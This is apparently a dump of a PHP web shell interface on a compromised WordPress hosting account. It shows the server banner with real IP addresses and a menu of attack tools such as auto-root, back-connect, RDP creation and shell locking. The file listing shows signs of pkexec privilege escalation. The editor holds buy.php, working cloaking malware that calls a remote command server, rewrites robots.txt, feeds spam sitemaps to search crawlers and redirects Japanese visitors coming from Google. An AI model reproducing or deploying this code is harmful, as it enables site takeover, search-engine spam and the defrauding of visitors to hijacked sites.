Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.27
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
adnangch /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
0ed2c
[ DIR ]
dr-xr-xr-x
50a8ed
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
dr-xr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
248
B
-rw-r--r--
.index.php
2.46
KB
-rwxrwxrwx
.litespeed_flag
297
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
2fsrebiw.php
1.83
KB
-rw-r--r--
6pqi51i0.php
1.83
KB
-rw-r--r--
buy.php
5.55
KB
-rw-r--r--
context.php
1.05
KB
-rw-r--r--
csv.php
6.46
KB
-rw-r--r--
error_log
87.03
KB
-rw-r--r--
google738db57e59672eb9.html
53
B
-rw-r--r--
google8fab2a5bdb4dc80e.html
53
B
-rw-r--r--
googlecb7c0319e31f0be0.html
53
B
-rw-r--r--
googled24b00a99624db3b.html
53
B
-rw-r--r--
googledc308e72d25873da.html
53
B
-rw-r--r--
htaccess
618
B
-rw-r--r--
index.php
5.55
KB
-rw-r--r--
index.php0
8.38
KB
-rw-r--r--
instaII.php
4.82
KB
-rw-r--r--
robots.txt
413
B
-r--r--r--
wp-test.php
1.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : buy.php
<?php error_reporting(0); @set_time_limit(120); @ignore_user_abort(1); $tr = "http://173.208.226.171/j250513_13/"; class Req { public function server($name = '', $default = '') { if (empty($name)) { return $_SERVER; } $name = strtoupper($name); return isset($_SERVER[$name]) ? $_SERVER[$name] : $default; } public function iss() { if ($this->server('HTTPS') && ("1" == $this->server('HTTPS') || "on" == strtolower($this->server('HTTPS')))) { return true; } elseif ('https' == $this->server('REQUEST_SCHEME')) { return true; } elseif ('443' == $this->server('SERVER_PORT')) { return true; } elseif ('https' == $this->server('HTTP_X_FORWARDED_PROTO')) { return true; } return false; } public function host() { $host = strval($this->server('HTTP_X_FORWARDED_HOST') ?: $this->server('HTTP_HOST')); return strpos($host, ':') ? strstr($host, ':', true) : $host; } public function scheme() { return $this->iss() ? "https" : "http"; } public function dm() { return $this->scheme() . "://" . $this->host(); } public function ip() { if (getenv('HTTP_CLIENT_IP')) { $ip = getenv('HTTP_CLIENT_IP'); } elseif (getenv('HTTP_X_FORWARDED_FOR')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); } elseif (getenv('REMOTE_ADDR')) { $ip = getenv('REMOTE_ADDR'); } else { $ip = $this->server('REMOTE_ADDR'); } return $ip; } public function isc() { $agent = strtolower($this->server('HTTP_USER_AGENT')); if ($agent != '' && preg_match('/googlebot|google|yahoo|aol/si', $agent)) { return true; } return false; } public function isg() { $refer = strtolower($this->server('HTTP_REFERER')); if ($refer != '' && preg_match('/google.co.jp|yahoo.co.jp|google.com/si', $refer)) { return true; } return false; } public function uri() { if (($pos = strpos($this->server('REQUEST_URI'), '.php')) !== false) { $script_name = basename($this->server('SCRIPT_FILENAME')); if (basename($this->server('SCRIPT_NAME')) === $script_name) { $url = $this->server('SCRIPT_NAME'); } elseif (basename($this->server('PHP_SELF')) === $script_name) { $url = $this->server('PHP_SELF'); } elseif (basename($this->server('ORIG_SCRIPT_NAME')) === $script_name) { $url = $this->server('ORIG_SCRIPT_NAME'); } elseif (($pos = strpos($this->server('PHP_SELF'), '/' . $script_name)) !== false) { $url = substr($this->server('SCRIPT_NAME'), 0, $pos) . '/' . $script_name; } elseif ($this->server('DOCUMENT_ROOT') && strpos($this->server('SCRIPT_FILENAME'), $this->server('DOCUMENT_ROOT')) === 0) { $url = str_replace($this->server('DOCUMENT_ROOT'), '', $this->server('SCRIPT_FILENAME')); } $requri = $url . substr($this->server('REQUEST_URI'), $pos + 4); } else { $requri = substr($this->server('REQUEST_URI'), strpos($this->server('REQUEST_URI'), '/')); } return rtrim($requri, '/'); } public function execReq($url, $p = array()) { $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($p)); $output = curl_exec($ch); $errorCode = curl_errno($ch); curl_close($ch); if (0 !== $errorCode) { return false; } return $output; } } $req = new Req(); $isc = $req->isc(); $isg = $req->isg(); $umap = $tr . "map"; $uri = urldecode($req->uri()); $p = array( "domain" => $req->dm(), "port" => 80, "uri" => $uri ); if (substr($uri, -6) == "robots") { $output = $req->execReq($tr . "robots", $p); $rpt = __DIR__ . "/robots.txt"; file_put_contents($rpt, $output); $robots_cont = @file_get_contents($rpt); if (strpos(strtolower($robots_cont), "sitemap")) { die("robots.txt file create success!"); } else { die("robots.txt file create fail!"); } } if (substr($uri, -4) == ".xml") { if (strpos($uri, "allsitemap.xml") || strpos($uri, "sitemap-index.xml") || strpos($uri, "sitemap-index-1.xml") || strpos($uri, "index.xml")) { $output = $req->execReq($umap, $p); header("Content-type:text/" . (substr($output, 0, 5) === '<?xml' ? 'xml' : 'plain') . '; charset=utf-8'); die('' . $output); } $output = $req->execReq($tr . "word", $p); header("Content-type:text/xml; charset=utf-8"); if ($output == "1") { die('' . $req->execReq($umap, $p)); } else { die('' . $output); } } $lang = $req->server('HTTP_ACCEPT_LANGUAGE'); if (!$isc && $isg && preg_match('/ja/i', $lang)) { $p["ip"] = $req->ip(); $action=$tr . "jump"; die($req->execReq($action, $p)); } if ($isc) { die('' . $req->execReq($tr . "indata", $p)); }
Close